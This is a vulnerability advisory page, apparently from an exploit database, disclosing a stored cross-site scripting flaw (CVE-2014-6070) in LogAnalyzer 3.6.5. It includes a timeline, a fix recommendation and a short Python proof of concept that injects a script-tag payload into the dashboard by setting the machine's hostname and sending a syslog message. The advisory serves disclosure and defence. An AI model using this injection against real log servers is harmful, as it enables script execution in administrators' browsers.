Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormDolev FarhiPACKETSTORM:128121
HistorySep 02, 2014 - 12:00 a.m.

LogAnalyzer 3.6.5 Cross Site Scripting

2014-09-0200:00:00
Dolev Farhi
packetstormsecurity.com
14

EPSS

0.003

Percentile

67.8%

JSON
`Author: Dolev Farhi @dolevff  
Application: LogAnalyzer  
Date: 8.2.2014  
Tested on: Red Hat Enterprise Linux 6.4  
Relevant CVEs: CVE-2014-6070  
  
  
1. About the application  
------------------------  
LogAnalyzer is a web interface to syslog and other network event data.   
It provides easy browsing, analysis of realtime network events and   
reporting services.  
  
  
2. Vulnerabilities Descriptions:  
-----------------------------  
It was found that an XSS injection is possible on a syslog server   
running LogAnalyzer version 3.6.5.  
by changing the hostname of any entity logging to syslog server with   
LogAnalyzer to <script>alert("xss")</script>, and sending an arbitrary  
syslog message, a client-side script injection execution is possible.  
  
  
3. Life cycle  
--------------------  
8.2.2014 - Vulnerability identified  
9.2.2014 - CVE Requested  
9.2.2014 - CVE Assigned  
9.2.2014 - Vendor releases a fix in a minor release version 3.6.6.  
  
  
4. proof of concept  
-----------------------  
a proof of concept video and a working exploit can be found here:  
http://research.openflare.org/poc/OF-2014-16/  
  
  
#!/usr/bin/python  
  
# Exploit title = LogAnalyzer 3.5.6 Stored XSS injection   
# Date: Sept 2014  
# Exploit Author: Dolev Farhi dolevf at yahoo dot com  
# Vendor homepage: loganalyzer.adiscon.com  
# Version: Stable 3.6.5  
# Tested on Red Hat Enterprise Linux 6.4  
# CVE: CVE-2014-6070  
  
import os  
import syslog  
  
  
hostname = os.uname()[1]  
payload = "\"<script>alert('XSS');</script>\""  
  
print("+ Setting temporary hostname to " + payload + "...")  
os.system("hostname " + payload)  
  
print("+ Injecting the syslog message...")  
syslog.syslog("syslog xss injection")  
  
print("+ Check LogAnalyzer dashboard...")  
  
raw_input("+ Press [enter] to restore hostname...")  
os.system("hostname " + "\"" + hostname + "\"")  
  
print("+ Hostname restored to " + hostname)  
  
  
  
5. Recommendation  
--------------------------  
upgrade to LogAnalyzer 3.6.6  
  
  
  
`

Related

ubuntucve 1
prion 1
nessus 1
cvelist 1
exploitpack 1
cve 1
nvd 1
zdt 2
debiancve 1
exploitdb 1
ubuntucve
ubuntucve
CVE-2014-6070
2014-09-11 00:00:00
prion
prion
Cross site scripting
2014-09-11 14:16:00
nessus
nessus
LogAnalyzer < 3.6.6 index.php / detail.php 'hostname' Parameter XSS
2014-12-05 00:00:00
cvelist
cvelist
CVE-2014-6070
2014-09-11 14:00:00
exploitpack
exploitpack
Syslog LogAnalyzer 3.6.5 - Persistent Cross-Site Scripting (Python)
2014-09-02 00:00:00
cve
cve
CVE-2014-6070
2014-09-11 14:16:04
nvd
nvd
CVE-2014-6070
2014-09-11 14:16:04
zdt
zdt
LogAnalyzer 3.6.5 Cross Site Scripting Vulnerability
2014-09-04 00:00:00
Syslog LogAnalyzer 3.6.5 - Stored XSS Exploit
2014-09-08 00:00:00
debiancve
debiancve
CVE-2014-6070
2014-09-11 14:16:04
exploitdb
exploitdb
Syslog LogAnalyzer 3.6.5 - Persistent Cross-Site Scripting
2014-09-02 00:00:00

EPSS

0.003

Percentile

67.8%

JSON
Related for PACKETSTORM:128121
ubuntucve1prion1nessus1cvelist1exploitpack1cve1nvd1zdt2debiancve1exploitdb1